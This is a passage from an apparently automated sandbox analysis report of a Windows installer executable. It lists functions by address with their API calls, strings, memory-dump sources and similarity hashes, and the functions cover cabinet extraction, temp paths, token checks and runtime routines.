                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                  • API String ID: 1811509786-402580132
                                                                                                                                                                  • Opcode ID: b734d3ba95e3f73c2c3dfa1ef41a6262e19d298406617bd819c9eac8c2c8c48f
                                                                                                                                                                  • Instruction ID: 6af478b96c7939ebea27466c2a17eef1cace209b8536f97c0666c4fae6e6ea93
                                                                                                                                                                  • Opcode Fuzzy Hash: b734d3ba95e3f73c2c3dfa1ef41a6262e19d298406617bd819c9eac8c2c8c48f
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D11E732900624BBDB122A69AC45F9FB679EF44764F214237F901FA1D0D73DBD109A9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00423563, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 004235FC
                                                                                                                                                                  • Unexpected call to CabWrite()., xrefs: 00423592
                                                                                                                                                                  • Failed to write during cabinet extraction., xrefs: 00423606
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                  • API String ID: 1970631241-3111339858
                                                                                                                                                                  • Opcode ID: 448688a120f65e55081abd2b082ab359c71b16faa1b812ca1a4a1bdacfd198cd
                                                                                                                                                                  • Instruction ID: aba64444cf9a178bc646d03b011f9689f1747036808cd1066973ea20be4072b8
                                                                                                                                                                  • Opcode Fuzzy Hash: 448688a120f65e55081abd2b082ab359c71b16faa1b812ca1a4a1bdacfd198cd
                                                                                                                                                                  • Instruction Fuzzy Hash: E2219D72600200AFDB10DF99E981A6A77F8FF98355F51006AFA09D7251EB79DA009B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00431E0F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00401C5F,00000008,00000000,00401C5F,77A19EB0,?,00401C5F), ref: 00431E2D
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401C5F), ref: 00431E37
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000000,00000014(TokenIntegrityLevel),00401C5F,00000004,?,?,00401C5F), ref: 00431E69
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00401C5F), ref: 00431EC0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$CloseErrorHandleInformationLastOpenProcess
                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                  • API String ID: 3370771294-1178289305
                                                                                                                                                                  • Opcode ID: 10299d0df2800e0e7bc8cd343d201969cbee8f8ce450f1f69ff12e54ff9c827f
                                                                                                                                                                  • Instruction ID: 22e0e4b6aa2898bc866b20146bcb1852a95f016925ff354c860e46807a580d67
                                                                                                                                                                  • Opcode Fuzzy Hash: 10299d0df2800e0e7bc8cd343d201969cbee8f8ce450f1f69ff12e54ff9c827f
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C21A132E00224EBDB109BA58C05B9FBBE8EF48751F119167EE05E7260D3758E00DAE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041200A, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,00000000,00000000), ref: 00412047
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000), ref: 00412051
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append bundle id on to temp path for working folder., xrefs: 004120A2
                                                                                                                                                                  • Failed to get temp path for working folder., xrefs: 0041207F
                                                                                                                                                                  • cache.cpp, xrefs: 00412075
                                                                                                                                                                  • %ls%ls\, xrefs: 0041208E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                  • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to get temp path for working folder.$cache.cpp
                                                                                                                                                                  • API String ID: 1238063741-3390808230
                                                                                                                                                                  • Opcode ID: b39f4db8eb083cb53cf605268e02988ac82891bb0ea537985509c4f7737455ec
                                                                                                                                                                  • Instruction ID: dac1148dbd79b6e88acff7cd64fc8e6bd7725c37da7f9b3ac0fb7aa691812746
                                                                                                                                                                  • Opcode Fuzzy Hash: b39f4db8eb083cb53cf605268e02988ac82891bb0ea537985509c4f7737455ec
                                                                                                                                                                  • Instruction Fuzzy Hash: 0711E976A403346BEB10AB65AC06BAB73E8EF08714F514267FE04F7181E6A89D0586DC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042498F, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,kNB,00424C15,00000000,?,00000000,?,?,?,?,00424E6B,?), ref: 0042499F
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424A23
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • _memmove.LIBCMT ref: 00424A0A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocMutexObjectProcessReleaseSingleWait_memmove
                                                                                                                                                                  • String ID: Failed to allocate memory for message data$NetFxChainer.cpp$kNB
                                                                                                                                                                  • API String ID: 1414281441-4192571162
                                                                                                                                                                  • Opcode ID: c1d5e254fa95bb264c84fec86deab602bdde9d6438ad7ebf39e95d0282d01c9a
                                                                                                                                                                  • Instruction ID: 6e795e1cb3fcaae299b93615e23e7fc3a90c5ae84d3962548fd37e0984958e06
                                                                                                                                                                  • Opcode Fuzzy Hash: c1d5e254fa95bb264c84fec86deab602bdde9d6438ad7ebf39e95d0282d01c9a
                                                                                                                                                                  • Instruction Fuzzy Hash: DD11C1B1300215EFC705CF28E885E5AB7B4FF09324B10426AF9149B3A0C775A810CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042C7F1, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00429471: __getptd_noexit.LIBCMT ref: 00429472
                                                                                                                                                                  • __lock.LIBCMT ref: 0042C82E
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0042C84B
                                                                                                                                                                  • _free.LIBCMT ref: 0042C85E
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00456950), ref: 0042C876
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                  • String ID: PiE$PiE
                                                                                                                                                                  • API String ID: 2704283638-4029992010
                                                                                                                                                                  • Opcode ID: 37c1afa94f4c77fea4bf828404523ce90894630681f1a075ec5d99cf73ed9ee3
                                                                                                                                                                  • Instruction ID: 03228da66fcfa7ea3f5ac16807b4e53df8256c56a0bc2b4258083cf4f688ca3c
                                                                                                                                                                  • Opcode Fuzzy Hash: 37c1afa94f4c77fea4bf828404523ce90894630681f1a075ec5d99cf73ed9ee3
                                                                                                                                                                  • Instruction Fuzzy Hash: 72018E31B01B319BDB11BF26B88675E7760AF54716F96811BE80067281CB3CA841CBCE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00428F67, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _malloc.LIBCMT ref: 00428F7F
                                                                                                                                                                    • Part of subcall function 0042BBE1: __FF_MSGBANNER.LIBCMT ref: 0042BBF8
                                                                                                                                                                    • Part of subcall function 0042BBE1: __NMSG_WRITE.LIBCMT ref: 0042BBFF
                                                                                                                                                                    • Part of subcall function 0042BBE1: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,0042C16B,00000000,00000000,00000000,00000000,?,0042C05B,00000018,00454160), ref: 0042BC24
                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00428F9B
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00428FB0
                                                                                                                                                                    • Part of subcall function 0042BDAE: RaiseException.KERNEL32(?,?,004013A3,<@E,?,?,?,00428FB5,004013A3,0045403C,?,00000001), ref: 0042BDFF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                  • String ID: PD$PD$XD
                                                                                                                                                                  • API String ID: 1059622496-1744646304
                                                                                                                                                                  • Opcode ID: de2cb9eeaa92f9b2679ed420b0d4ab4c7bc796660f8885e94cb3834fc7b8c0f4
                                                                                                                                                                  • Instruction ID: 607f025958ff4f27cfe404b7407e4a388e9fc0384777074a3d35904e5d2cf390
                                                                                                                                                                  • Opcode Fuzzy Hash: de2cb9eeaa92f9b2679ed420b0d4ab4c7bc796660f8885e94cb3834fc7b8c0f4
                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0A97230412966DB04ABAAF902ADE7BA9EF04358F90445FF900D5581DFB8954193DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004294F8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 0042953C
                                                                                                                                                                    • Part of subcall function 0042BF92: __mtinitlocknum.LIBCMT ref: 0042BFA4
                                                                                                                                                                    • Part of subcall function 0042BF92: EnterCriticalSection.KERNEL32(00000000,?,00429541,0000000D,004540B8,00000008,004294D3,00000000,00000000,004079F6,?,00000000,00000000), ref: 0042BFBD
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00429549
                                                                                                                                                                  • __lock.LIBCMT ref: 0042955D
                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0042957B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                  • String ID: PiE$pD
                                                                                                                                                                  • API String ID: 1687444384-1223142982
                                                                                                                                                                  • Opcode ID: 8a465103055b879455ce8d18f30644dd812b24814ea5d32ed34ecd48c3f4d897
                                                                                                                                                                  • Instruction ID: acfa835674f11dec69aaafc9f37e290999a1fd7a24391b083e904e8df7a43b0e
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a465103055b879455ce8d18f30644dd812b24814ea5d32ed34ecd48c3f4d897
                                                                                                                                                                  • Instruction Fuzzy Hash: 21016571640B10EFD7209F66E805749B7E0EF50329F60890FE49A972A1DB78A644CF4D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00432058, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00402807,00000000), ref: 0043206C
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00432073
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00402807,00000000), ref: 0043208A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                  • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                                                                  • API String ID: 4275029093-1586155540
                                                                                                                                                                  • Opcode ID: 02ec5d69645dc593d7829237a3d4fe000449b2344850d20b327b3dcf9b24a43b
                                                                                                                                                                  • Instruction ID: 1c2b62f06a2d4c064b51deea977ea63b547293a1211d44e1e2f1f319ff91cdd9
                                                                                                                                                                  • Opcode Fuzzy Hash: 02ec5d69645dc593d7829237a3d4fe000449b2344850d20b327b3dcf9b24a43b
                                                                                                                                                                  • Instruction Fuzzy Hash: D7F09C32B00225BBDB289BA59D09B5B7BA8EF05741F104117FE05E7290E7B4CD04C7E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00435DCA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00435DD9
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00457F3C), ref: 00435DF6
                                                                                                                                                                  • CLSIDFromProgID.OLE32(Msxml2.DOMDocument,00457F2C,?,?,?,?,00000000), ref: 00435E11
                                                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00457F2C,?,?,?,?,00000000), ref: 00435E1D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                  • API String ID: 2109125048-2356320334
                                                                                                                                                                  • Opcode ID: 5af71891296fcd9e0bb841e7ef5288b169b86ffae2d8745879eb89c313e9c057
                                                                                                                                                                  • Instruction ID: fa76ad948ba996168496535c4b4d9681446a4c6c2984325c252c7fe18d8fe86a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5af71891296fcd9e0bb841e7ef5288b169b86ffae2d8745879eb89c313e9c057
                                                                                                                                                                  • Instruction Fuzzy Hash: D8F05532748A2057D720A721BE09B1B2E26C7CCBA2F103073FE00D6016E75CD9418AFC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041858E, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 136COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 004185A6
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 004186EA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to recreate command-line for update bundle., xrefs: 00418664
                                                                                                                                                                  • update\%ls, xrefs: 00418604
                                                                                                                                                                  • Failed to default local update source, xrefs: 00418618
                                                                                                                                                                  • Failed to set update bundle., xrefs: 004186BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                                                                  • API String ID: 3168844106-1266646976
                                                                                                                                                                  • Opcode ID: 7bcbe938afe1955cf9d09c29f4e5c4a5c72f765bd3978a21b8225f3a9cbd1e58
                                                                                                                                                                  • Instruction ID: 3211d5ce1b1c37571ad97e996e9f61fd6830fd8da65cebc21a4293d893e00add
                                                                                                                                                                  • Opcode Fuzzy Hash: 7bcbe938afe1955cf9d09c29f4e5c4a5c72f765bd3978a21b8225f3a9cbd1e58
                                                                                                                                                                  • Instruction Fuzzy Hash: FC419871600209FFDF129F90C846EEAB7A5EF04314F10426AF905A6261DB79ED909B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00432ABE, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 114stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,00000002,000000B8,00000000,00000000), ref: 00432AFA
                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,000000F9,00000001,00000000,000000F9,00000001,000000B8,00000000,00000000), ref: 00432B5C
                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00432B68
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: p/E$p/E$regutil.cpp
                                                                                                                                                                  • API String ID: 1659193697-374004985
                                                                                                                                                                  • Opcode ID: 6aea1d358a8816e9d1bfd1a98081204910cd806d2e01eff5382e25a4cb3a11ee
                                                                                                                                                                  • Instruction ID: e031d6d86915fca4c0194e0d7ed63df218eb81be9f5ce09dff9bf1756aa15326
                                                                                                                                                                  • Opcode Fuzzy Hash: 6aea1d358a8816e9d1bfd1a98081204910cd806d2e01eff5382e25a4cb3a11ee
                                                                                                                                                                  • Instruction Fuzzy Hash: B431B57290021AAFCF11DF95DD80A9FBBB9FF88340F11006AF904A7250DB78ED119B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417759, Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 00417784
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00417793
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 004177A7
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004177B7
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004177D1
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0041782E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3812958022-0
                                                                                                                                                                  • Opcode ID: 6ab5cbdb74788e072fd1532da86ffa3c259634561007776b41f72226900fa0d2
                                                                                                                                                                  • Instruction ID: 364cc4166c8a9fcdf72307228b71cf19c9c13da4539396fc036918be9803076b
                                                                                                                                                                  • Opcode Fuzzy Hash: 6ab5cbdb74788e072fd1532da86ffa3c259634561007776b41f72226900fa0d2
                                                                                                                                                                  • Instruction Fuzzy Hash: AE21A132108218BFDB11AF68DC49EAB3B75FF44354F14492AFA15AA1A0C735DD60DB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004295AB, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 004295AB
                                                                                                                                                                    • Part of subcall function 00429765: EncodePointer.KERNEL32(00000000,?,004295B0,004266A8,00454020,00000014), ref: 00429768
